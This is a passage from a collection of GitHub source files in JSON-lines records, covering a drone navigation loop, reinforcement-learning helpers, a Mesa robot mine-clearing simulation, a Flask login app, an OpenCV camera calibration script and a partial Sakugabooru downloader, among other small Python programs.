= drone.get_orientation()\n velocity = drone.get_velocity()\n\n right = lidars['right']\n\n roll_rate = right_wall_pid.compute(right)\n drone.command(roll=roll_rate, pitch=0, yaw_rate=0, z=HEIGHT_Z_AXIS, wait=False)\n\n if abs(right - right_far_threshold) < PRECISION:\n print(f\"Distance from right: {right}\\nFinished stick_to_right()\")\n break # Drone can return to main-loop\n\n\ndef tunnel():\n pass\n\ndef emergency():\n print(\"Emergency mode!\")\n pass\n\n\ndef return_home():\n print(\"Returning home\")\n pass\n\ndef fly_forward(drone: Drone):\n\n print(\"Flying forward\")\n\n\n\ndef nav_algo(drone: Drone):\n global drone_points, sim_time, graph\n # Drone's State Machine:\n # 1. Emergency\n # 2. Fix right wall\n # 3. Scan surroundings\n # 4. Move to target point\n # 5. Return home\n battery_low = False\n\n # Takeoff\n drone.command(0, 0, 0, HEIGHT_Z_AXIS, True)\n # Add starting point to the graph:\n graph.append((drone.get_position()['x'],\n drone.get_position()['y'],\n drone.get_position()['z']))\n print(f'Home point: {graph[0]}')\n i = 0\n time_last = 0\n start_time = time.time()\n time_sec_last = 0\n while True:\n lidars = drone.get_lidars()\n position = drone.get_position()\n orientation = drone.get_orientation()\n velocity = drone.get_velocity()\n\n sim_time = time_last - start_time\n time_sec = int(sim_time)\n if time_sec > time_sec_last:\n if i % 1000 == 0:\n print(\"Time now: \", float('%.1f' % sim_time))\n if time_sec >= 60 * FLIGHT_TIME_MIN/2:\n battery_low = True\n time_sec_last = time_sec\n\n if i == 1000000:\n i = 0\n\n front = lidars['front']\n right = lidars['right']\n left = lidars['left']\n down = lidars['down']\n x = position['x']\n y = position['y']\n z = position['z']\n\n if front < emergency_threshold:\n emergency()\n\n elif left < tunnel_threshold and right < tunnel_threshold:\n tunnel()\n\n elif right > right_far_threshold:\n stick_to_right_wall(drone) # Loop\n\n elif battery_low:\n return_home()\n # Handle emergency actions:\n else:\n fly_forward(drone)\n\n i += 1\n time_last = time.time()\n\n\nif __name__ == '__main__':\n with Manager(coordinate_system.AIRSIM, method=nav_algo) as man:\n with GUIManager(man, 10, 10, 10, 3) as gui:\n gui.start()\n","repo_name":"ItaySharabi/LearnPython","sub_path":"Mine/NavAlgo.py","file_name":"NavAlgo.py","file_ext":"py","file_size_in_byte":3386,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"15017419043","text":"def day(month):\n a=[\"January\",\"March\",\"May\",\"July\",\"August\",\"October\",\"December\"]\n b=[\"April\",\"June\",\"September\",\"November\"]\n if month in a:\n return \"31 days\"\n elif month in b:\n return \"30 days\"\n else:\n return \"28/29 days\"\nprint(\"List of month: \",\"January,\",\"Februray,\",\"March,\",\"April,\",\"May,\",\"June,\",\"July,\",\"August,\",\"September,\",\"October,\",\"November,\",\"December\")\nprint(\"Enter the month: \")\na=input()\nprint(\"Number of days: \",day(a))","repo_name":"aa2301/test","sub_path":"month to days.py","file_name":"month to days.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"13495438618","text":"import gym\nimport numpy as np\n\n\ndef get_cumulative_rewards(rewards, gamma=0.99, dones=None):\n \"\"\"\n take a list of immediate rewards r(s,a) for the whole session\n compute cumulative returns (a.k.a. G(s,a) in Sutton '16)\n G_t = r_t + gamma*r_{t+1} + gamma^2*r_{t+2} + ...\n \"\"\"\n rewards = np.asarray(rewards)\n if dones is None:\n dones = np.zeros(rewards.shape[-1])\n dones = np.asarray(dones)\n\n batch_size = rewards.shape[0] if len(rewards.shape) > 1 else 1\n cumulative_rewards = []\n current_reward = np.zeros(batch_size)\n for r, done in zip(rewards.T[::-1], dones.T[::-1]):\n # do not discount if it is the last observation in a session\n current_reward = r + gamma * current_reward * (1 - done)\n cumulative_rewards.append(current_reward)\n\n return np.stack(cumulative_rewards[::-1], axis=1).reshape(rewards.shape)\n\n\ndef get_total_rewards(rewards, dones):\n \"\"\"\n Calculate total reward for all sessions in a batch\n \"\"\"\n rewards = np.asarray(rewards)\n dones = np.array(dones)\n dones = dones.reshape((-1, dones.shape[-1]))\n dones[:, -1] = False\n\n total_rewards = []\n current_total_reward = 0\n for reward, done in zip(rewards.flat, dones.flat):\n current_total_reward += reward\n if done:\n total_rewards.append(current_total_reward)\n current_total_reward = 0\n return total_rewards\n\n\ndef generate_session(agent, env, max_num_steps=1000):\n \"\"\"\n play a full session with provided agent and returns sequences of states, actions and rewards\n \"\"\"\n # arrays to record session\n states, actions, rewards = [], [], []\n s = env.reset()\n for t in range(max_num_steps):\n # action probabilities array aka pi(a|s)\n a = agent.get_action(s)\n new_s, r, done, info = env.step(a)\n\n # record session history to train later\n states.append(s)\n actions.append(a)\n rewards.append(r)\n\n s = new_s\n if done:\n break\n\n return states, actions, rewards\n\n\ndef generate_session_batch(agent, envs, num_steps=32):\n \"\"\"\n Play session in multiple environments and generate a batch of (states, actions, rewards, dones)\n \"\"\"\n # arrays to record session\n states, actions, rewards, dones = [], [], [], []\n s = envs.reset()\n for t in range(num_steps):\n # action probabilities array aka pi(a|s)\n a = agent.get_action(s)\n new_s, r, done, info = envs.step(a)\n\n # record session history to train later\n states.append(s)\n actions.append(a)\n rewards.append(r)\n dones.append(done)\n\n s = new_s\n\n states = np.asarray(states, dtype=np.float32).swapaxes(0, 1)\n actions = np.asarray(actions, dtype=np.int32).swapaxes(0, 1)\n rewards = np.asarray(rewards, dtype=np.float32).swapaxes(0, 1)\n dones = np.asarray(dones, dtype=bool).swapaxes(0, 1)\n\n last_value = agent.get_value(s)\n\n return states, actions, rewards, dones, last_value\n\n\ndef make_fun(agent, env, record_video=False, render=True, n_episodes=1):\n if record_video:\n env = gym.wrappers.Monitor(env, directory='videos', force=True)\n\n for episode in range(n_episodes):\n state = env.reset()\n done = False\n total_reward = 0\n while not np.asarray(done).all():\n if render:\n env.render()\n action = agent.get_action(state)\n new_s, reward, done, _ = env.step(action)\n total_reward += reward\n state = new_s\n print(\"Episode %d total reward: %f\" % (episode, total_reward))\n env.close()\n","repo_name":"vadimadr/reinforcement_learning","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"74902030943","text":"class Option:\n def __init__(self, name, cwd, args, env):\n self.edit = False\n self.options = {\n \"name\": name,\n \"cwd\": cwd,\n \"args\": args,\n \"env\": env,\n }\n self.options.update(env)\n self.max = len(self.options.keys())\n","repo_name":"rFurgan/Gigachad","sub_path":"Option.py","file_name":"Option.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"21320210091","text":"a = \"BBQWORLD\"\nb = \"KFCAPPLE\"\nc = \"LOT\"\nl1 = [a, b, c]\nn = input()\n\ncnt = 0\nfor i in range(3):\n for j in range(len(l1[i])):\n if l1[i][j] == n:\n cnt += 1\n\nprint(cnt)","repo_name":"giokim12/Algorithm","sub_path":"mincoding/15/min_15_9.py","file_name":"min_15_9.py","file_ext":"py","file_size_in_byte":185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"33445920546","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\n__author__=\"Limin Liu\"\n\n'''\nUsing pillow library to filter image and resize image\n'''\n\nfrom PIL import Image,ImageFilter\n\nim=Image.open('test.jpg') # open image\n\n\nim2=im.filter(ImageFilter.BLUR) # filter image\nim2.save('blur.jpg','jpeg')\n\n\nw,h=im.size\nprint('Original image size: %sx%s' %(w,h))\nim.thumbnail((w//2,h//2)) #resize image as half of source image\nprint('Resize image to: %sx%s' %(w//2,h//2))\nim.save('thumbnail.jpg','jpeg')","repo_name":"liulimin90/Python_Practice","sub_path":"Pillow_test.py","file_name":"Pillow_test.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"11814930997","text":"import enum\nimport math\nimport random\nimport uuid\nfrom enum import Enum\n\nimport mesa\nimport numpy as np\nfrom collections import defaultdict\n\nimport mesa.space\nfrom mesa import Agent, Model\nfrom mesa.datacollection import DataCollector\nfrom mesa.time import RandomActivation\nfrom mesa.visualization.ModularVisualization import VisualizationElement, ModularServer\nfrom mesa.visualization.modules import ChartModule\n\nMAX_ITERATION = 100\nPROBA_CHGT_ANGLE = 0.01\n\n\ndef move(x, y, speed, angle):\n return x + speed * math.cos(angle), y + speed * math.sin(angle)\n\n\ndef go_to(x, y, speed, dest_x, dest_y):\n if np.linalg.norm((x - dest_x, y - dest_y)) < speed:\n return (dest_x, dest_y), 2 * math.pi * random.random()\n else:\n angle = math.acos((dest_x - x)/np.linalg.norm((x - dest_x, y - dest_y)))\n if dest_y < y:\n angle = - angle\n return move(x, y, speed, angle), angle\n\n\nclass MarkerPurpose(Enum):\n DANGER = enum.auto(),\n INDICATION = enum.auto()\n\n\nclass ContinuousCanvas(VisualizationElement):\n local_includes = [\n \"./js/simple_continuous_canvas.js\",\n ]\n\n def __init__(self, canvas_height=500,\n canvas_width=500, instantiate=True):\n VisualizationElement.__init__(self)\n self.canvas_height = canvas_height\n self.canvas_width = canvas_width\n self.identifier = \"space-canvas\"\n if (instantiate):\n new_element = (\"new Simple_Continuous_Module({}, {},'{}')\".\n format(self.canvas_width, self.canvas_height, self.identifier))\n self.js_code = \"elements.push(\" + new_element + \");\"\n\n def portrayal_method(self, obj):\n return obj.portrayal_method()\n\n def render(self, model):\n representation = defaultdict(list)\n for obj in model.schedule.agents:\n portrayal = self.portrayal_method(obj)\n if portrayal:\n portrayal[\"x\"] = ((obj.x - model.space.x_min) /\n (model.space.x_max - model.space.x_min))\n portrayal[\"y\"] = ((obj.y - model.space.y_min) /\n (model.space.y_max - model.space.y_min))\n representation[portrayal[\"Layer\"]].append(portrayal)\n for obj in model.mines:\n portrayal = self.portrayal_method(obj)\n if portrayal:\n portrayal[\"x\"] = ((obj.x - model.space.x_min) /\n (model.space.x_max - model.space.x_min))\n portrayal[\"y\"] = ((obj.y - model.space.y_min) /\n (model.space.y_max - model.space.y_min))\n representation[portrayal[\"Layer\"]].append(portrayal)\n for obj in model.markers:\n portrayal = self.portrayal_method(obj)\n if portrayal:\n portrayal[\"x\"] = ((obj.x - model.space.x_min) /\n (model.space.x_max - model.space.x_min))\n portrayal[\"y\"] = ((obj.y - model.space.y_min) /\n (model.space.y_max - model.space.y_min))\n representation[portrayal[\"Layer\"]].append(portrayal)\n for obj in model.obstacles:\n portrayal = self.portrayal_method(obj)\n if portrayal:\n portrayal[\"x\"] = ((obj.x - model.space.x_min) /\n (model.space.x_max - model.space.x_min))\n portrayal[\"y\"] = ((obj.y - model.space.y_min) /\n (model.space.y_max - model.space.y_min))\n representation[portrayal[\"Layer\"]].append(portrayal)\n for obj in model.quicksands:\n portrayal = self.portrayal_method(obj)\n if portrayal:\n portrayal[\"x\"] = ((obj.x - model.space.x_min) /\n (model.space.x_max - model.space.x_min))\n portrayal[\"y\"] = ((obj.y - model.space.y_min) /\n (model.space.y_max - model.space.y_min))\n representation[portrayal[\"Layer\"]].append(portrayal)\n return representation\n\n\nclass Obstacle: # Environnement: obstacle infranchissable\n def __init__(self, x, y, r):\n self.x = x\n self.y = y\n self.r = r\n\n def portrayal_method(self):\n portrayal = {\"Shape\": \"circle\",\n \"Filled\": \"true\",\n \"Layer\": 1,\n \"Color\": \"black\",\n \"r\": self.r}\n return portrayal\n\n\nclass Quicksand: # Environnement: ralentissement\n def __init__(self, x, y, r):\n self.x = x\n self.y = y\n self.r = r\n\n def portrayal_method(self):\n portrayal = {\"Shape\": \"circle\",\n \"Filled\": \"true\",\n \"Layer\": 1,\n \"Color\": \"olive\",\n \"r\": self.r}\n return portrayal\n\n\nclass Mine: # Environnement: élément à ramasser\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def portrayal_method(self):\n portrayal = {\"Shape\": \"circle\",\n \"Filled\": \"true\",\n \"Layer\": 2,\n \"Color\": \"black\",\n \"r\": 2}\n return portrayal\n\n\nclass Marker: # La classe pour les balises\n def __init__(self, x, y, purpose, direction=None):\n self.x = x\n self.y = y\n self.purpose = purpose\n if purpose == MarkerPurpose.INDICATION:\n if direction is not None:\n self.direction = direction\n else:\n raise ValueError(\"Direction should not be none for indication marker\")\n\n def portrayal_method(self):\n portrayal = {\"Shape\": \"circle\",\n \"Filled\": \"true\",\n \"Layer\": 2,\n \"Color\": \"red\" if self.purpose == MarkerPurpose.DANGER else \"green\",\n \"r\": 2}\n return portrayal\n\n\nclass Robot(Agent): # La classe des agents\n def __init__(self, unique_id: int, model: Model, x, y, speed, sight_distance, angle=0.0):\n super().__init__(unique_id, model)\n self.x = x\n self.y = y\n self.speed = speed\n self.sight_distance = sight_distance\n self.angle = angle\n self.counter = 0\n self.max_speed = speed\n self.counter = 0\n\n def step(self):\n # TODO L'intégralité du code du TP peut être ajoutée ici.\n if self.counter>0:\n self.counter-=1\n \n #DETRUIRE UNE MINE - NIVEAU 0\n defused = False\n mines = [mine for mine in self.model.mines if (self.x,self.y)==(mine.x,mine.y)]\n if len(mines)>0:\n self.model.mines.remove(mines[0])\n self.model.defused_mines+=1\n defused = True\n\n\n #CAS DE SABLES MOUVANTS\n quicksands = [quicksand for quicksand in self.model.quicksands if np.linalg.norm((self.x-quicksand.x,self.y-quicksand.y))0:\n (x_next,y_next),self.angle = go_to(self.x,self.y,self.speed,markers[0].x,markers[0].y)\n to_marker = True\n # Collecter une balise + Se déplacer suivant l'indication de la balise collectée - NIVEAU 3\n markers=[]\n if self.counter == 0:\n markers = [marker for marker in self.model.markers if (self.x,self.y)==(marker.x,marker.y)]\n if len(markers)>0:\n marker = markers[0]\n if marker.purpose == MarkerPurpose.DANGER:\n self.angle+= math.pi\n elif marker.purpose == MarkerPurpose.INDICATION:\n self.angle = marker.direction + math.pi/2\n self.model.markers.remove(marker)\n self.counter = 0\n #SE DEPLACER (CHANGER L'ANGLE) - NIVEAU 5\n elif random.random() < PROBA_CHGT_ANGLE and not to_marker:\n self.angle = 2*math.pi*random.random()\n\n\n #SE DIRIGER VERS UNE MINE - NIVEAU 2\n mines = [ mine for mine in self.model.mines if np.linalg.norm((self.x-mine.x ,self.y-mine.y )) < self.sight_distance]\n\n if len(mines)>0:\n (x_next,y_next),self.angle = go_to(self.x,self.y,self.speed,mines[0].x,mines[0].y)\n elif not to_marker:\n x_next,y_next = move(self.x,self.y,self.speed,self.angle)\n\n \n robots = [robot for robot in self.model.schedule.agents if np.linalg.norm((self.x-robot.x,self.y-robot.y))self.model.space.x_min and y_nextself.model.space.y_min and not isPossibleCollision:\n break\n\n self.angle = 2*math.pi *random.random()\n x_next,y_next = move(self.x,self.y,self.speed,self.angle)\n\n # Déposer une balise INDICATION - NIVEAU 0\n if defused: \n self.model.markers.append(Marker(self.x,self.y,MarkerPurpose.INDICATION,self.angle))\n self.counter=self.max_speed//2\n\n self.x,self.y = x_next,y_next\n\n\n def portrayal_method(self):\n portrayal = {\"Shape\": \"arrowHead\", \"s\": 1, \"Filled\": \"true\", \"Color\": \"Red\", \"Layer\": 3, 'x': self.x,\n 'y': self.y, \"angle\": self.angle}\n return portrayal\n\n\nclass MinedZone(Model):\n collector = DataCollector(\n model_reporters={\"Mines\": lambda model: len(model.mines),\n \"Danger markers\": lambda model: len([m for m in model.markers if\n m.purpose == MarkerPurpose.DANGER]),\n \"Indication markers\": lambda model: len([m for m in model.markers if\n m.purpose == MarkerPurpose.INDICATION]),\n \"Defused mines\": lambda model:model.defused_mines, \n \"Steps in quicksands\":lambda model:model.steps_in_quicksands, \n },\n agent_reporters={})\n\n def __init__(self, n_robots, n_obstacles, n_quicksand, n_mines, speed):\n Model.__init__(self)\n self.space = mesa.space.ContinuousSpace(600, 600, False)\n self.schedule = RandomActivation(self)\n self.mines = [] # Access list of mines from robot through self.model.mines\n self.markers = [] # Access list of markers from robot through self.model.markers (both read and write)\n self.obstacles = [] # Access list of obstacles from robot through self.model.obstacles\n self.quicksands = [] # Access list of quicksands from robot through self.model.quicksands\n for _ in range(n_obstacles):\n self.obstacles.append(Obstacle(random.random() * 500, random.random() * 500, 10 + 20 * random.random()))\n for _ in range(n_quicksand):\n self.quicksands.append(Quicksand(random.random() * 500, random.random() * 500, 10 + 20 * random.random()))\n for _ in range(n_robots):\n x, y = random.random() * 500, random.random() * 500\n while [o for o in self.obstacles if np.linalg.norm((o.x - x, o.y - y)) < o.r] or \\\n [o for o in self.quicksands if np.linalg.norm((o.x - x, o.y - y)) < o.r]:\n x, y = random.random() * 500, random.random() * 500\n self.schedule.add(\n Robot(int(uuid.uuid1()), self, x, y, speed,\n 2 * speed, random.random() * 2 * math.pi))\n for _ in range(n_mines):\n x, y = random.random() * 500, random.random() * 500\n while [o for o in self.obstacles if np.linalg.norm((o.x - x, o.y - y)) < o.r] or \\\n [o for o in self.quicksands if np.linalg.norm((o.x - x, o.y - y)) < o.r]:\n x, y = random.random() * 500, random.random() * 500\n self.mines.append(Mine(x, y))\n self.datacollector = self.collector\n self.defused_mines = 0\n self.steps_in_quicksands = 0\n\n def step(self):\n self.datacollector.collect(self)\n self.schedule.step()\n if not self.mines:\n self.running = False\n\n\ndef run_single_server():\n chart = ChartModule([{\"Label\": \"Mines\",\n \"Color\": \"Orange\"},\n {\"Label\": \"Danger markers\",\n \"Color\": \"Red\"},\n {\"Label\": \"Indication markers\",\n \"Color\": \"Green\"},\n { \"Label\": \"Defused mines\",\n \"Color\":\"Blue\"},\n {\"Label\":\"Steps in quicksands\",\n \"Color\":\"Black\"}\n \n ],\n data_collector_name='datacollector')\n server = ModularServer(MinedZone,\n [ContinuousCanvas(),\n chart],\n \"Deminer robots\",\n {\"n_robots\": mesa.visualization.\n ModularVisualization.UserSettableParameter('slider', \"Number of robots\", 7, 3,\n 15, 1),\n \"n_obstacles\": mesa.visualization.\n ModularVisualization.UserSettableParameter('slider', \"Number of obstacles\", 5, 2, 10, 1),\n \"n_quicksand\": mesa.visualization.\n ModularVisualization.UserSettableParameter('slider', \"Number of quicksand\", 5, 2, 10, 1),\n \"speed\": mesa.visualization.\n ModularVisualization.UserSettableParameter('slider', \"Robot speed\", 15, 5, 40, 5),\n \"n_mines\": mesa.visualization.\n ModularVisualization.UserSettableParameter('slider', \"Number of mines\", 15, 5, 30, 1)})\n server.port = 8521\n server.launch()\n\n\nif __name__ == \"__main__\":\n run_single_server()\n","repo_name":"AmaniMokni/Multi_agents_IA310","sub_path":"IA310_TP3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"26363879537","text":"from flask import Flask, render_template, request\nfrom flask_login import LoginManager, login_user, logout_user, login_required, UserMixin,current_user\nfrom shoulder import Shoulder\nfrom image import MyImage\nimport numpy as np\nimport cv2\nimport os\nimport datetime\nfrom model import MySQL\n\nSAVE_DIR = './static/images'\n\napp = Flask(__name__)\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\napp.config['SECRET_KEY'] = os.urandom(24)\n\n\n## ユーザー認証\n\n\nclass User(UserMixin):\n def __init__(self, id, name):\n self.id = id\n self.name = name\n\n@login_manager.user_loader\ndef load_user(id):\n user_id = int(id)\n db = MySQL()\n user_name = db.user_loader(user_id)\n db.close()\n if (user_name != None):\n return User(user_id, user_name)\n else:\n return None\n\n\n## ページ\n\n\n# インデックス\n@app.route('/')\n@login_required\ndef index():\n return render_template('index.html', title='インデックス')\n\n# メイン\n@app.route('/main', methods=['POST'])\n@login_required\ndef main():\n if request.method == 'POST':\n company_name = request.form['company_name']\n company_stage = request.form['company_stage']\n session_timestamp = str(datetime.datetime.now())[0:19]\n return render_template('main.html', title='メイン', session_timestamp=session_timestamp, company_name=company_name, company_stage=company_stage)\n else:\n return render_template('index.html', title='インデックス')\n\n# 保存\n@app.route('/save', methods=['POST'])\n@login_required\ndef save():\n if request.method == 'POST':\n\n session = request.form['session']\n result = request.form['result']\n sentence = request.form['sentence']\n image = request.form['image']\n\n db = MySQL()\n\n session_list = session.split(',')\n session_id = db.insert_session(int(current_user.id), session_list[0], session_list[1], session_list[2])\n\n result_list = result.split(',')\n result_id = db.insert_result(session_id, str(result_list[0]), str(result_list[1]))\n\n sentence_list = sentence.split('|')\n for sentence_row in sentence_list:\n sentence_ele = sentence_row.split(',')\n if len(sentence_ele) != 1 and sentence_ele[2] != 'Infinity':\n db.insert_sentence(result_id, str(sentence_ele[0]), str(sentence_ele[1]), int(sentence_ele[2]))\n\n\n image_list = image.split('|')\n for image_row in image_list:\n image_ele = image_row.split(',')\n if len(image_ele) != 1:\n db.insert_image(result_id, str(image_ele[0]), str(image_ele[1]), str(image_ele[2]))\n\n db.close()\n\n return render_template('index.html', title='インデックス')\n else:\n return render_template('index.html', title='インデックス')\n\n# アーカイブ\n@app.route('/archive')\n@login_required\ndef archive():\n\n db = MySQL()\n rows = db.archive(int(current_user.id))\n db.close()\n\n return render_template('archive.html', title='アーカイブ',rows=rows)\n\n# アーカイブ詳細\n@app.route('/archive/')\n@login_required\ndef archive_detail(id):\n session_id = id\n db = MySQL()\n row_session, row_result, log_list = db.archive_detail(session_id)\n db.close()\n return render_template('archive_detail.html', title='アーカイブ詳細', row_session=row_session, row_result=row_result, log_list=log_list)\n\n# 設定\n@app.route('/settings')\n@login_required\ndef settings():\n return render_template('settings.html', title='設定')\n\n# 設定編集\n@app.route('/settings_edit')\n@login_required\ndef settings_edit():\n return render_template('settings_edit.html', title='設定')\n\n\n## ログイン機能\n\n\n# ログイン\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if(request.method == 'POST'):\n user_name = request.form['user_name']\n password = request.form['password']\n\n db = MySQL()\n flag, user_id = db.login(user_name, password)\n db.close()\n\n if(flag):\n user = User(user_id, user_name)\n login_user(user)\n return render_template('index.html', title='インデックス')\n else:\n return render_template('login.html', title='ログイン', message='ログインできませんでした')\n\n else:\n return render_template('login.html', title='ログイン', message='ログインしてください')\n\n# ログアウト\n@app.route('/logout')\n@login_required\ndef logout():\n logout_user()\n return render_template('login.html', title='ログイン', message='ログインしてください。')\n\n# ログインしていない場合\n@login_manager.unauthorized_handler\ndef unauthorized_handler():\n return render_template('login.html', title='ログイン', message='ログインしてください。')\n\n# 新規登録\n@app.route('/signup', methods=['GET', 'POST'])\ndef signup():\n if(request.method == 'POST'):\n db = MySQL()\n flag = db.signup(request.form['user_name'], request.form['password'])\n db.close()\n if (flag):\n return render_template('login.html', title='ログイン', message='ログインしてください')\n else:\n return render_template('signup.html', title='新規登録', message ='IDがすでに使われています')\n else:\n return render_template('signup.html', title='新規登録', message ='新規登録')\n\n\n# 画像処理\n\n\n# 検出\n@app.route('/shoulder', methods=['POST'])\ndef shoulder():\n stream = request.files['image'].stream\n img_array = np.asarray(bytearray(stream.read()), dtype=np.uint8)\n img = cv2.imdecode(img_array, 1)\n\n shoulder = Shoulder(img)\n result, save_path = shoulder.detect()\n\n return result + ',' + save_path\n\n# 画像処理デモ\n@app.route('/all_images')\ndef all_images():\n path = './static/images/all'\n files = os.listdir(path)\n files_dir = [f for f in files if os.path.isdir(os.path.join(path, f))]\n if len(files_dir)>1:\n return render_template('all_images.html', title='処理過程', dir_name=files_dir[len(files_dir)-1])\n else: # エラー出ないようにディレクトリ用意 00000000_000000\n return render_template('all_images.html', title='処理過程', dir_name=\"00000000_000000\")\n\n\n# 起動時の設定\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"Hayashi08/hf21","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6369,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"20624242583","text":"#coding:utf-8\nimport cv2\nimport numpy as np\nimport glob\n\ndef calibrateCamera9x6(jpgfilepath,cfgsavepath,ChessSize=25):\n\n # 找棋盘格角点\n # 阈值\n criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, ChessSize, 0.001)\n #棋盘格模板规格\n w = 9\n h = 6\n # 世界坐标系中的棋盘格点,例如(0,0,0), (1,0,0), (2,0,0) ....,(8,5,0),去掉Z坐标,记为二维矩阵\n objp = np.zeros((w*h,3), np.float32)\n objp[:,:2] = np.mgrid[0:w,0:h].T.reshape(-1,2)\n # 储存棋盘格角点的世界坐标和图像坐标对\n objpoints = [] # 在世界坐标系中的三维点\n imgpoints = [] # 在图像平面的二维点\n\n images = glob.glob(jpgfilepath+'/*.jpg')\n for fname in images:\n img = cv2.imread(fname)\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n # 找到棋盘格角点\n ret, corners = cv2.findChessboardCorners(gray, (w,h),None)\n # 如果找到足够点对,将其存储起来\n if ret == True:\n cv2.cornerSubPix(gray,corners,(11,11),(-1,-1),criteria)\n objpoints.append(objp)\n imgpoints.append(corners)\n # 将角点在图像上显示\n cv2.drawChessboardCorners(img, (w,h), corners, ret)\n cv2.imshow('findCorners',img)\n cv2.waitKey(1)\n cv2.destroyAllWindows()\n\n # 标定\n ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, gray.shape[::-1], None, None)\n print(mtx)\n print(dist)\n\n #保存结果\n fs = cv2.FileStorage(cfgsavepath, cv2.FileStorage_WRITE)\n fs.write('mtx',mtx)\n fs.write('dist',dist)\n fs.release()\n\n #\n # 反投影误差\n total_error = 0\n for i in xrange(len(objpoints)):\n imgpoints2, _ = cv2.projectPoints(objpoints[i], rvecs[i], tvecs[i], mtx, dist)\n error = cv2.norm(imgpoints[i],imgpoints2, cv2.NORM_L2)/len(imgpoints2)\n total_error += error\n total_error=total_error/len(objpoints)\n\n return total_error\n\nif __name__ == \"__main__\":\n\n err=calibrateCamera9x6('res/ANCcam_1080p','res/anccameraMTX.json')\n print(\"total_error:\",err)\n\n # 去畸变\n '''\n img2 = cv2.imread('calib/00169.png')\n h, w = img2.shape[:2]\n newcameramtx, roi=cv2.getOptimalNewCameraMatrix(mtx,dist,(w,h),0,(w,h)) # 自由比例参数\n dst = cv2.undistort(img2, mtx, dist, None, newcameramtx)\n # 根据前面ROI区域裁剪图片\n #x,y,w,h = roi\n #dst = dst[y:y+h, x:x+w]\n cv2.imwrite('calibresult.png',dst)\n '''\n\n","repo_name":"kidtic/RGBLED_Position","sub_path":"test/cameraCalibrate.py","file_name":"cameraCalibrate.py","file_ext":"py","file_size_in_byte":2512,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"73511111904","text":"# BJ 1074 Z <분할 정복, 재귀>\n# https://www.acmicpc.net/problem/1074\n# 시간 : 20\n# 문제 리뷰 : M,R\n# 회고 : 본인은 분할정복을 재귀 함수로 하여 문제를 해결하였다.\n# 하지만 Best Pythonic Code는 행의 증가와 열의 증가의 규칙을 이진수 값을 사진수로 나타냄으로 찾아 한줄로 표현하였다... 대박\n\n\ndef solution(n, r, c, t):\n if n==0:\n return t\n if r<(2**(n-1)) and c<(2**(n-1)):\n return solution(n-1, r, c, t)\n elif r<(2**(n-1)) and c>=(2**(n-1)):\n return solution(n-1, r, c-2**(n-1), t+2**(2*(n-1)))\n elif r>=(2**(n-1)) and c<(2**(n-1)):\n return solution(n-1, r-2**(n-1), c, t+2*2**(2*(n-1)))\n else:\n return solution(n-1, r-2**(n-1), c-2**(n-1), t+3*2**(2*(n-1)))\n \nN,r,c=map(int,input().split())\nprint(solution(N,r,c,0))\n\n\n''' Best Pythonic Code\nn,r,c=map(int,input().split());print(int(f'{c:b}',4)+2*int(f'{r:b}',4))\n'''","repo_name":"ddooom/CodingTest","sub_path":"problems/202109/[M,R]_[BJ_1074_Z]_[분할정복,재귀].py","file_name":"[M,R]_[BJ_1074_Z]_[분할정복,재귀].py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"34551897819","text":"import os, re, urllib3\nfrom bs4 import BeautifulSoup as bs\nfrom typing import List\n\nspecialCharacters = {\n '\\\\': '',\n '/': '',\n ':': '',\n '*': '',\n '?': '',\n '\"': '',\n '<': '',\n '>': '',\n '|': ''\n}\nmainFolder = \"Sakugabooru Downloads\"\nhttp = urllib3.PoolManager()\n\ndef search(infos : List, className : str) -> List:\n lst = []\n for element in infos:\n if element[\"class\"] == [className]:\n childElement = element.findChildren('a')\n for target in childElement:\n if target.text != '?':\n lst += [target.text]\n return lst\n\ndef nameFile(res, id : str) -> str:\n soup = bs(res.data,\"html.parser\")\n data = soup.find('ul', id=\"tag-sidebar\")\n infos = data.findChildren('li')\n ext = soup.find('a', id=\"highres\")[\"href\"].split('.')[-1]\n\n artists = ' & '.join(search(infos, \"tag-type-artist\"))\n copyrights = ' '.join(search(infos, \"tag-type-copyright\"))\n\n fileName = f\"{copyrights} By {artists} ({id}).{ext}\".translate(str.maketrans(specialCharacters))\n\n return fileName\n\ndef grabPost(folder : str, id : str):\n link = f\"https://www.sakugabooru.com/post/show/{id}\"\n res = http.request('GET', link)\n mediaLink = bs(res.data, \"html.parser\").find('a', id=\"highres\")[\"href\"]\n\n media = nameFile(res, id)\n print(f\"DOWNLOADING : {media}\")\n\n if not os.path.exists(folder):\n os.makedirs(folder)\n\n filepath = f\"{folder}/{media}\"\n\n with open(filepath, 'wb+') as targetfile:\n dt = http.request('GET', mediaLink)\n targetfile.write(dt.data)\n print(f\"SUCCESS : {media}\")\n\ndef getId(link : str) -> str:\n return re.search(r\"(\\d+)\", 